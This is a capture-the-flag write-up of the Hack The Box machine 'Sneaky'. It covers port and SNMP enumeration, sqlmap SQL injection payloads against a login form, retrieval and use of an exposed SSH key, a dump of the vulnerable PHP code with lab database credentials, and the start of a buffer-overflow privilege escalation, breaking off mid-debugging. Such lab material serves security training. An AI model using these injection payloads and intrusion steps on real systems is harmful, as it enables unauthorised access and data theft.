Sneaky
Contents
Ports scan
u505@kali:~/HTB/Machines/Sneaky$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.20 [sudo] password for u505:
Starting masscan 1.0.5 at 2020-05-01 13:38:16 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 80/tcp on 10.10.10.20 Discovered open port 161/udp on 10.10.10.20
u505@kali:~/HTB/Machines/Sneaky$ nmap -sC -sV 10.10.10.20 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-01 09:38 EDT Nmap scan report for sneaky.htb (10.10.10.20) Host is up (0.040s latency). Not shown: 999 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) |_http-server-header: Apache/2.4.7 (Ubuntu) |_http-title: Under Development!
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.15 seconds
The full scan found port snmp (UDP 161) open, we scan it specifically.
u505@kali:~/HTB/Machines/Sneaky$ sudo nmap -sC -sV -sU -p U:161 10.10.10.20 [sudo] password for u505: Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-03 09:41 EDT Nmap scan report for sneaky.htb (10.10.10.20) Host is up (0.038s latency).
PORT STATE SERVICE VERSION 161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public) | snmp-info: | enterprise: net-snmp | engineIDFormat: unknown | engineIDData: fcf2da02d0831859 | snmpEngineBoots: 8 |_ snmpEngineTime: 7m08s | snmp-interfaces: | lo | IP address: 127.0.0.1 Netmask: 255.0.0.0 | Type: softwareLoopback Speed: 10 Mbps | Traffic stats: 0.00 Kb sent, 0.00 Kb received | eth0 | IP address: 10.10.10.20 Netmask: 255.255.255.0 | MAC address: 00:50:56:b9:42:6f (VMware) | Type: ethernetCsmacd Speed: 4 Gbps |_ Traffic stats: 108.03 Kb sent, 136.48 Kb received | snmp-netstat: | TCP 127.0.0.1:3306 0.0.0.0:0 |_ UDP 0.0.0.0:161 *:* | snmp-processes: | 1: | Name: init | Path: /sbin/init | 405: | Name: upstart-udev-br | Path: upstart-udev-bridge | Params: --daemon | 409: | Name: systemd-udevd | Path: /lib/systemd/systemd-udevd | Params: --daemon | 453: | Name: dbus-daemon | Path: dbus-daemon | Params: --system --fork | 486: | Name: systemd-logind | Path: /lib/systemd/systemd-logind | 490: | Name: rsyslogd | Path: rsyslogd | 512: | Name: upstart-file-br | Path: upstart-file-bridge | Params: --daemon | 908: | Name: upstart-socket- | Path: upstart-socket-bridge | Params: --daemon | 958: | Name: getty | Path: /sbin/getty | Params: -8 38400 tty4 | 961: | Name: getty | Path: /sbin/getty | Params: -8 38400 tty5 | 966: | Name: getty | Path: /sbin/getty | Params: -8 38400 tty2 | 967: | Name: getty | Path: /sbin/getty | Params: -8 38400 tty3 | 970: | Name: getty | Path: /sbin/getty | Params: -8 38400 tty6 | 1002: | Name: sshd | Path: /usr/sbin/sshd | Params: -D | 1003: | Name: atd | Path: atd | 1005: | Name: cron | Path: cron | 1006: | Name: acpid | Path: acpid | Params: -c /etc/acpi/events -s /var/run/acpid.socket | 1054: | Name: mysqld | Path: /usr/sbin/mysqld | 1085: | Name: snmpd | Path: /usr/sbin/snmpd | Params: -Lsd -Lf /dev/null -u snmp -g snmp -I -smux mteTrigger mteTriggerConf -p /var/run/snmpd.pid | 1103: | Name: vmtoolsd | Path: /usr/bin/vmtoolsd | 1181: | Name: apache2 | Path: /usr/sbin/apache2 | Params: -k start | 1185: | Name: apache2 | Path: /usr/sbin/apache2 | Params: -k start | 1186: | Name: apache2 | Path: /usr/sbin/apache2 | Params: -k start | 1187: | Name: apache2 | Path: /usr/sbin/apache2 | Params: -k start | 1188: | Name: apache2 | Path: /usr/sbin/apache2 | Params: -k start | 1189: | Name: apache2 | Path: /usr/sbin/apache2 | Params: -k start | 1224: | Name: getty | Path: /sbin/getty |_ Params: -8 38400 tty1 | snmp-sysdescr: Linux Sneaky 4.4.0-75-generic #96~14.04.1-Ubuntu SMP Thu Apr 20 11:06:56 UTC 2017 i686 |_ System uptime: 7m7.82s (42782 timeticks) | snmp-win32-software: | accountsservice-0.6.35-0ubuntu7.3; 0-01-01T00:00:00 | acpid-1:2.0.21-1ubuntu2; 0-01-01T00:00:00 | adduser-3.113+nmu3ubuntu3; 0-01-01T00:00:00 | apache2-2.4.7-1ubuntu4.15; 0-01-01T00:00:00 | apache2-bin-2.4.7-1ubuntu4.15; 0-01-01T00:00:00 | apache2-data-2.4.7-1ubuntu4.15; 0-01-01T00:00:00 | apparmor-2.10.95-0ubuntu2.6~14.04.1; 0-01-01T00:00:00 ... | xz-utils-5.1.1alpha+20120614-2ubuntu2; 0-01-01T00:00:00 | zerofree-1.0.2-1ubuntu1; 0-01-01T00:00:00 |_ zlib1g-1:1.2.8.dfsg-1ubuntu1; 0-01-01T00:00:00 Service Info: Host: Sneaky
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 97.55 seconds
Web Server
Dirsearch
u505@kali:~/HTB/Machines/Sneaky$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -r 1 -e "html,php,txt,js" -f -u http://sneaky.htb
_|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| )
Extensions: html, php, txt, js | HTTP method: get | Threads: 10 | Wordlist size: 22974 | Recursion level: 1
Error Log: /opt/utils/dirsearch/logs/errors-20-05-01_13-04-57.log
Target: http://sneaky.htb
[13:04:57] Starting: [13:04:57] 403 - 282B - /.html [13:04:57] 403 - 281B - /.php [13:05:24] 200 - 464B - /dev/ [13:05:39] 403 - 283B - /icons/ [13:05:41] 200 - 183B - /index.html [13:06:15] 403 - 291B - /server-status/ [13:06:37] Starting: dev/ [13:06:38] 403 - 286B - /dev/.html [13:06:38] 403 - 285B - /dev/.php [13:07:22] 200 - 464B - /dev/index.html [13:08:20] Starting: icons/ [13:08:21] 403 - 287B - /icons/.php [13:08:21] 403 - 288B - /icons/.html [13:09:34] 200 - 35KB - /icons/README.html [13:09:44] 403 - 289B - /icons/small/ [13:10:04] Starting: server-status/
Task Completed
Dirsearch finds only the dev directory.
Dev folder
The dev folder shows a login page.
u505@kali:~/HTB/Machines/Sneaky$ curl http://sneaky.htb/dev/
<!DOCTYPE HTML>
<html>
<head>
<title>Member's Area Only - DEV</title>
</head>
<body>
<h1>Member's Area Only - Login Now!</h1>
<form method="post" action="./login.php">
<input type="text" name="name">
<input type="password" name="pass">
<input type="submit" value="login">
</form>
</body>
</html>
But it's strange, dirsearch didn't detect the login.php page.
u505@kali:~/HTB/Machines/Sneaky$ curl -v http://sneaky.htb/dev/login.php * Trying 10.10.10.20:80... * TCP_NODELAY set * Connected to sneaky.htb (10.10.10.20) port 80 (#0) > GET /dev/login.php HTTP/1.1 > Host: sneaky.htb > User-Agent: curl/7.68.0 > Accept: */* > * Mark bundle as not supporting multiuse * HTTP 1.0, assume close after body < HTTP/1.0 404 Not Found < Date: Fri, 01 May 2020 13:54:53 GMT < Server: Apache/2.4.7 (Ubuntu) < X-Powered-By: PHP/5.5.9-1ubuntu4.21 < Content-Length: 49 < Connection: close < Content-Type: text/html < * Closing connection 0 <?xml version="1.0" encoding="UTF-8"?>Not Found:
The php code answers an error code 404 when a user is not found. It's the reason why diresearch didn't detect it.
Sqlmap
We intercept the HTTP request from the login page.
u505@kali:~/HTB/Machines/Sneaky$ cat login.req POST /dev/login.php HTTP/1.1 Host: sneaky.htb User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://sneaky.htb/dev/ Content-Type: application/x-www-form-urlencoded Content-Length: 21 Connection: close Upgrade-Insecure-Requests: 1
name=admin&pass=admin
We launch sqlmap at level 1 and risk 1 at first.
u505@kali:~/HTB/Machines/Sneaky$ sqlmap -r login.req
___
__H__
___ ___[']_____ ___ ___ {1.4.4#stable}
|_ -| . ["] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 10:37:12 /2020-05-03/
[10:37:12] [INFO] parsing HTTP request from 'login.req'
[10:37:12] [INFO] resuming back-end DBMS 'mysql'
[10:37:12] [INFO] testing connection to the target URL
[10:37:13] [CRITICAL] page not found (404)
it is not recommended to continue in this kind of cases. Do you want to quit and make sure that everything is set up properly? [Y/n] n
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: name (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: name=admin' AND (SELECT 4291 FROM (SELECT(SLEEP(5)))TLhB) AND 'WRmH'='WRmH&pass=admin
Parameter: pass (POST)
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: name=admin&pass=admin' UNION ALL SELECT CONCAT(0x7162627671,0x41775155705a765749494a414c686c64574e644c6775785144434866786f6e416f4e746741495675,0x716b627a71),NULL-- -
---
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: name, type: Single quoted string (default)
[1] place: POST, parameter: pass, type: Single quoted string
[q] Quit
> q
[10:37:43] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 1 times
[10:37:43] [ERROR] user quit
[*] ending @ 10:37:43 /2020-05-03/
Sqlmap detects that both parameters seem vulnerable at injection attacks.
Sql Injection
Injecting the name field with a basic tautology based injection provides a link to a ssh key.
Injecting the pass field discovers the user list.
u505@kali:~/HTB/Machines/Sneaky$ wget http://sneaky.htb/dev/sshkeyforadministratordifficulttimes --2020-05-01 10:10:10-- http://sneaky.htb/dev/sshkeyforadministratordifficulttimes Resolving sneaky.htb (sneaky.htb)... 10.10.10.20 Connecting to sneaky.htb (sneaky.htb)|10.10.10.20|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 1675 (1.6K) Saving to: ‘sshkeyforadministratordifficulttimes’
sshkeyforadministra 100%[===================>] 1.64K --.-KB/s in 0s
2020-05-01 10:10:10 (88.8 MB/s) - ‘sshkeyforadministratordifficulttimes’ saved [1675/1675] u505@kali:~/HTB/Machines/Sneaky$ chmod 600 sshkeyforadministratordifficulttimes u505@kali:~/HTB/Machines/Sneaky$ ssh -i sshkeyforadministratordifficulttimes thrasivoulos@sneaky.htb ssh: connect to host sneaky.htb port 22: Connection refused
We have the key, but the server isn't listening on port ssh.
Snmp server
MIBs installation
At first, I ran a snmpwalk without MIBS, but I've downloaded them to have a more friendly output.
u505@kali:~/HTB/Machines/Sneaky$ sudo apt install snmp-mibs-downloader u505@kali:~/HTB/Machines/Sneaky$ sudo vi /etc/snmp/snmp.conf u505@kali:~/HTB/Machines/Sneaky$ cat /etc/snmp/snmp.conf # As the snmp packages come without MIB files due to license reasons, loading # of MIBs is disabled by default. If you added the MIBs you can reenable # loading them by commenting out the following line. #mibs :
# If you want to globally change where snmp libraries, commands and daemons # look for MIBS, change the line below. Note you can set this for individual # tools with the -M option or MIBDIRS environment variable. # #mibdirs /usr/share/snmp/mibs:/usr/share/snmp/mibs/iana:/usr/share/snmp/mibs/ietf
Full snmapwalk
u505@kali:~/HTB/Machines/Sneaky$ snmpwalk -v 2c -c public 10.10.10.20 > snmpwalk u505@kali:~/HTB/Machines/Sneaky$ view snmpwalk ... SNMPv2-MIB::sysDescr.0 = STRING: Linux Sneaky 4.4.0-75-generic #96~14.04.1-Ubuntu SMP Thu Apr 20 11:06:56 UTC 2017 i686 ... IF-MIB::ifPhysAddress.2 = STRING: 0:50:56:b9:42:6f ... IP-MIB::ipAddressIfIndex.ipv4."10.10.10.20" = INTEGER: 2 IP-MIB::ipAddressIfIndex.ipv4."10.10.10.255" = INTEGER: 2 IP-MIB::ipAddressIfIndex.ipv4."127.0.0.1" = INTEGER: 1 IP-MIB::ipAddressIfIndex.ipv6."00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:01" = INTEGER: 1 IP-MIB::ipAddressIfIndex.ipv6."de:ad:be:ef:00:00:00:00:02:50:56:ff:fe:b9:42:6f" = INTEGER: 2 IP-MIB::ipAddressIfIndex.ipv6."fe:80:00:00:00:00:00:00:02:50:56:ff:fe:b9:42:6f" = INTEGER: 2 ... HOST-RESOURCES-MIB::hrSWRunPath.1 = STRING: "/sbin/init" HOST-RESOURCES-MIB::hrSWRunPath.405 = STRING: "upstart-udev-bridge" HOST-RESOURCES-MIB::hrSWRunPath.409 = STRING: "/lib/systemd/systemd-udevd" HOST-RESOURCES-MIB::hrSWRunPath.453 = STRING: "dbus-daemon" HOST-RESOURCES-MIB::hrSWRunPath.486 = STRING: "/lib/systemd/systemd-logind" HOST-RESOURCES-MIB::hrSWRunPath.490 = STRING: "rsyslogd" HOST-RESOURCES-MIB::hrSWRunPath.512 = STRING: "upstart-file-bridge" HOST-RESOURCES-MIB::hrSWRunPath.908 = STRING: "upstart-socket-bridge" HOST-RESOURCES-MIB::hrSWRunPath.958 = STRING: "/sbin/getty" HOST-RESOURCES-MIB::hrSWRunPath.961 = STRING: "/sbin/getty" HOST-RESOURCES-MIB::hrSWRunPath.966 = STRING: "/sbin/getty" HOST-RESOURCES-MIB::hrSWRunPath.967 = STRING: "/sbin/getty" HOST-RESOURCES-MIB::hrSWRunPath.970 = STRING: "/sbin/getty" HOST-RESOURCES-MIB::hrSWRunPath.1002 = STRING: "/usr/sbin/sshd" HOST-RESOURCES-MIB::hrSWRunPath.1003 = STRING: "atd" HOST-RESOURCES-MIB::hrSWRunPath.1005 = STRING: "cron" HOST-RESOURCES-MIB::hrSWRunPath.1006 = STRING: "acpid" HOST-RESOURCES-MIB::hrSWRunPath.1054 = STRING: "/usr/sbin/mysqld" HOST-RESOURCES-MIB::hrSWRunPath.1085 = STRING: "/usr/sbin/snmpd" HOST-RESOURCES-MIB::hrSWRunPath.1103 = STRING: "/usr/bin/vmtoolsd" HOST-RESOURCES-MIB::hrSWRunPath.1181 = STRING: "/usr/sbin/apache2" HOST-RESOURCES-MIB::hrSWRunPath.1185 = STRING: "/usr/sbin/apache2" HOST-RESOURCES-MIB::hrSWRunPath.1186 = STRING: "/usr/sbin/apache2" HOST-RESOURCES-MIB::hrSWRunPath.1187 = STRING: "/usr/sbin/apache2" HOST-RESOURCES-MIB::hrSWRunPath.1188 = STRING: "/usr/sbin/apache2" HOST-RESOURCES-MIB::hrSWRunPath.1189 = STRING: "/usr/sbin/apache2" HOST-RESOURCES-MIB::hrSWRunPath.1224 = STRING: "/sbin/getty" HOST-RESOURCES-MIB::hrSWRunPath.1381 = STRING: "/usr/sbin/apache2" HOST-RESOURCES-MIB::hrSWRunParameters.1 = "" HOST-RESOURCES-MIB::hrSWRunParameters.405 = STRING: "--daemon" HOST-RESOURCES-MIB::hrSWRunParameters.409 = STRING: "--daemon" HOST-RESOURCES-MIB::hrSWRunParameters.453 = STRING: "--system --fork" HOST-RESOURCES-MIB::hrSWRunParameters.486 = "" HOST-RESOURCES-MIB::hrSWRunParameters.490 = "" HOST-RESOURCES-MIB::hrSWRunParameters.512 = STRING: "--daemon" HOST-RESOURCES-MIB::hrSWRunParameters.908 = STRING: "--daemon" HOST-RESOURCES-MIB::hrSWRunParameters.958 = STRING: "-8 38400 tty4" HOST-RESOURCES-MIB::hrSWRunParameters.961 = STRING: "-8 38400 tty5" HOST-RESOURCES-MIB::hrSWRunParameters.966 = STRING: "-8 38400 tty2" HOST-RESOURCES-MIB::hrSWRunParameters.967 = STRING: "-8 38400 tty3" HOST-RESOURCES-MIB::hrSWRunParameters.970 = STRING: "-8 38400 tty6" HOST-RESOURCES-MIB::hrSWRunParameters.1002 = STRING: "-D" HOST-RESOURCES-MIB::hrSWRunParameters.1003 = "" HOST-RESOURCES-MIB::hrSWRunParameters.1005 = "" HOST-RESOURCES-MIB::hrSWRunParameters.1006 = STRING: "-c /etc/acpi/events -s /var/run/acpid.socket" HOST-RESOURCES-MIB::hrSWRunParameters.1054 = "" HOST-RESOURCES-MIB::hrSWRunParameters.1085 = STRING: "-Lsd -Lf /dev/null -u snmp -g snmp -I -smux mteTrigger mteTriggerConf -p /var/run/snmpd.pid" HOST-RESOURCES-MIB::hrSWRunParameters.1103 = "" HOST-RESOURCES-MIB::hrSWRunParameters.1181 = STRING: "-k start" HOST-RESOURCES-MIB::hrSWRunParameters.1185 = STRING: "-k start" HOST-RESOURCES-MIB::hrSWRunParameters.1186 = STRING: "-k start" HOST-RESOURCES-MIB::hrSWRunParameters.1187 = STRING: "-k start" HOST-RESOURCES-MIB::hrSWRunParameters.1188 = STRING: "-k start" HOST-RESOURCES-MIB::hrSWRunParameters.1189 = STRING: "-k start" HOST-RESOURCES-MIB::hrSWRunParameters.1224 = STRING: "-8 38400 tty1" HOST-RESOURCES-MIB::hrSWRunParameters.1381 = STRING: "-k start" ...
The ssh server is running, and we found an IPv6 address.
User Flag
With snmp, we find IPs.
u505@kali:~/HTB/Machines/Sneaky$ snmpwalk -v 2c -c public 10.10.10.20 "IP-MIB::ipAddressIfIndex.ipv4"
IP-MIB::ipAddressIfIndex.ipv4."10.10.10.20" = INTEGER: 2
IP-MIB::ipAddressIfIndex.ipv4."10.10.10.255" = INTEGER: 2
IP-MIB::ipAddressIfIndex.ipv4."127.0.0.1" = INTEGER: 1
u505@kali:~/HTB/Machines/Sneaky$ snmpwalk -v 2c -c public 10.10.10.20 "IP-MIB::ipAddressIfIndex.ipv6"
IP-MIB::ipAddressIfIndex.ipv6."00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:01" = INTEGER: 1
IP-MIB::ipAddressIfIndex.ipv6."de:ad:be:ef:00:00:00:00:02:50:56:ff:fe:b9:42:6f" = INTEGER: 2
IP-MIB::ipAddressIfIndex.ipv6."fe:80:00:00:00:00:00:00:02:50:56:ff:fe:b9:42:6f" = INTEGER: 2
If we run nmap against the IPv6 address, the ssh port is available.
u505@kali:~/HTB/Machines/Sneaky$ nmap -6 -sC -sV dead:beef::250:56ff:feb9:426f Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-02 11:21 EDT Nmap scan report for dead:beef::250:56ff:feb9:426f Host is up (0.037s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 5d:5d:2a:97:85:a1:20:e2:26:e4:13:54:58:d6:a4:22 (DSA) | 2048 a2:00:0e:99:0f:d3:ed:b0:19:d4:6b:a8:b1:93:d9:87 (RSA) | 256 e3:29:c4:cb:87:98:df:99:6f:36:9f:31:50:e3:b9:42 (ECDSA) |_ 256 e6:85:a8:f8:62:67:f7:01:28:a1:aa:00:b5:60:f2:21 (ED25519) 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) |_http-server-header: Apache/2.4.7 (Ubuntu) |_http-title: 400 Bad Request Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results: | address-info: | IPv6 EUI-64: | MAC address: | address: 00:50:56:b9:42:6f |_ manuf: VMware
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 10.34 seconds
We ssh into the server.
u505@kali:~/HTB/Machines/Sneaky$ ssh -i sshkeyforadministratordifficulttimes thrasivoulos@dead:beef::0250:56ff:feb9:426f The authenticity of host 'dead:beef::250:56ff:feb9:426f (dead:beef::250:56ff:feb9:426f)' can't be established. ECDSA key fingerprint is SHA256:KCwXgk+ryPhJU+UhxyHAO16VCRFrty3aLPWPSkq/E2o. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added 'dead:beef::250:56ff:feb9:426f' (ECDSA) to the list of known hosts. Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-75-generic i686)
* Documentation: https://help.ubuntu.com/
System information as of Sun May 3 16:38:21 EEST 2020
System load: 0.0 Memory usage: 4% Processes: 176 Usage of /: 9.9% of 18.58GB Swap usage: 0% Users logged in: 0
Graph this data and manage this system at: https://landscape.canonical.com/
Your Hardware Enablement Stack (HWE) is supported until April 2019. Last login: Sun May 14 20:22:53 2017 from dead:beef:1::1077 thrasivoulos@Sneaky:~$ cat user.txt <USER_FLAG>
Enumeration
thrasivoulos@Sneaky:~$ id uid=1000(thrasivoulos) gid=1000(thrasivoulos) groups=1000(thrasivoulos),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare) u505@kali:~/HTB/Machines/Sneaky$ mkdir www u505@kali:~/HTB/Machines/Sneaky$ cd www/ u505@kali:~/HTB/Machines/Sneaky/www$ cp /opt/utils/privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh ./ u505@kali:~/HTB/Machines/Sneaky/www$ cp /opt/utils/LinEnum/LinEnum.sh ./ u505@kali:~/HTB/Machines/Sneaky/www$ cp /opt/utils/pspy/pspy32 ./
u505@kali:~/HTB/Machines/Sneaky/www$ scp -i ../sshkeyforadministratordifficulttimes * thrasivoulos@[dead:beef::0250:56ff:feb9:426f]:/tmp/ LinEnum.sh 100% 46KB 375.4KB/s 00:00 linpeas.sh 100% 208KB 1.6MB/s 00:00 pspy32 100% 2594KB 4.6MB/s 00:00
thrasivoulos@Sneaky:/var/www/html/dev$ cat login.php <?php $name = isset($_POST['name']) ? $_POST['name'] : ; $pass = isset($_POST['pass']) ? $_POST['pass'] : ; ?> <?php echo '<?xml version="1.0" encoding="UTF-8"?>' ?> <?php $link = new PDO('mysql:dbname=dev;host=localhost', 'root', 'sup3rs3cr3tp4ssf0rmysql');
$sql = "SELECT * FROM users WHERE name = '{$name}' AND pass = '{$pass}' "; /* $sql = 'SELECT * FROM users WHERE ' . "name = '" . mysqli_real_escape_string($name, $link) . "' " . "AND pass = '" . mysqli_real_escape_string($pass, $link) . "'"; */
$result = $link->query($sql);
if (!$result) { header('HTTP/1.0 500 Internal Serever Error'); echo 'Internal Serever Error: '; exit; }
while ($row = $result->fetch(PDO::FETCH_ASSOC)) { $rows[] = $row; } if (empty($rows)) { header('HTTP/1.0 404 Not Found'); echo 'Not Found: '; exit; } else { ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xml:lang="ja" xmlns="http://www.w3.org/1999/xhtml"> <head> <title>DevWebsite</title> </head> <body> <h1>DevWebsite Login</h1> <?php foreach ($rows as $row) { ?> <dt> <dl>name: <?php echo htmlspecialchars($row['name'], ENT_QUOTES, 'UTF-8'); ?></dl> </dt> <?php } } ?> <p> <p> <p> <p><center><a href="sshkeyforadministratordifficulttimes">My Key</a></center> <p><center>Noone is ever gonna find this key :P</center> <br> </body> </html> <br> <br>
We access the database.
thrasivoulos@Sneaky:/var/www/html/dev$ mysql -p -u root Enter password: Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 3535 Server version: 5.5.55-0ubuntu0.14.04.1 (Ubuntu)
Copyright (c) 2000, 2017, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases; +--------------------+ | Database | +--------------------+ | information_schema | | dev | | mysql | | performance_schema | +--------------------+ 4 rows in set (0.00 sec)
mysql> use dev; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A
Database changed mysql> show tables; +---------------+ | Tables_in_dev | +---------------+ | users | +---------------+ 1 row in set (0.00 sec)
mysql> select * from users; +--------------+----------------------+ | name | pass | +--------------+----------------------+ | admin | sup3rstr0ngp4ssf0r4d | | thrasivoulos | sup3rstr0ngp4ssf0r4d | +--------------+----------------------+ 2 rows in set (0.00 sec)
mysql> quit Bye
But we only find a password that we don't need anymore.
thrasivoulos@Sneaky:/tmp$ ./LinEnum.sh
...
[-] World-writable files (excluding /proc and /sys):
-rwxrwxrwx 1 root root 0 May 4 2017 /var/crash/.lock
...
[-] SGID files:
-rwxr-sr-x 1 root shadow 30432 Mar 16 2016 /sbin/unix_chkpwd
-rwsrwsr-x 1 root root 7301 May 4 2017 /usr/local/bin/chal
-rwsr-sr-x 1 libuuid libuuid 17996 Nov 24 2016 /usr/sbin/uuidd
The chal file is a program with setuid flag enabled.
u505@kali:~/HTB/Machines/Sneaky$ scp -i sshkeyforadministratordifficulttimes thrasivoulos@[dead:beef::0250:56ff:feb9:426f]:/usr/local/bin/chal ./ chal 100% 7301 174.0KB/s 00:00
Privileges escalation
This program is very simple and have an obvious buffer overflow.
Security check
thrasivoulos@Sneaky:/tmp$ ldd /usr/local/bin/chal
linux-gate.so.1 => (0xb7ffe000)
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7e44000)
/lib/ld-linux.so.2 (0x80000000)
thrasivoulos@Sneaky:/tmp$ ldd /usr/local/bin/chal
linux-gate.so.1 => (0xb7ffe000)
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7e44000)
/lib/ld-linux.so.2 (0x80000000)
thrasivoulos@Sneaky:/tmp$ cat /proc/sys/kernel/randomize_va_space
0
ASLR is not enabled.
u505@kali:~/HTB/Machines/Sneaky$ checksec chal
[*] '/opt/HTB/Machines/Sneaky/chal'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
The flag NX is not enabled, so this program is allowed to execute code from the stack.
Overflow offset
u505@kali:~/HTB/Machines/Sneaky$ gdb chal GNU gdb (Debian 9.1-3) 9.1 Copyright (C) 2020 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "x86_64-linux-gnu". Type "show configuration" for configuration details. For bug reporting instructions, please see: <http://www.gnu.org/software/gdb/bugs/>. Find the GDB manual and other documentation resources online at: <http://www.gnu.org/software/gdb/documentation/>.
For help, type "help". Type "apropos word" to search for commands related to "word"... Reading symbols from chal... (No debugging symbols found in chal) (gdb) init-peda gdb-peda$ pattern_create 400 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%y'
gdb-peda$ r 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%y' Starting program: /opt/HTB/Machines/Sneaky/chal 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%y'
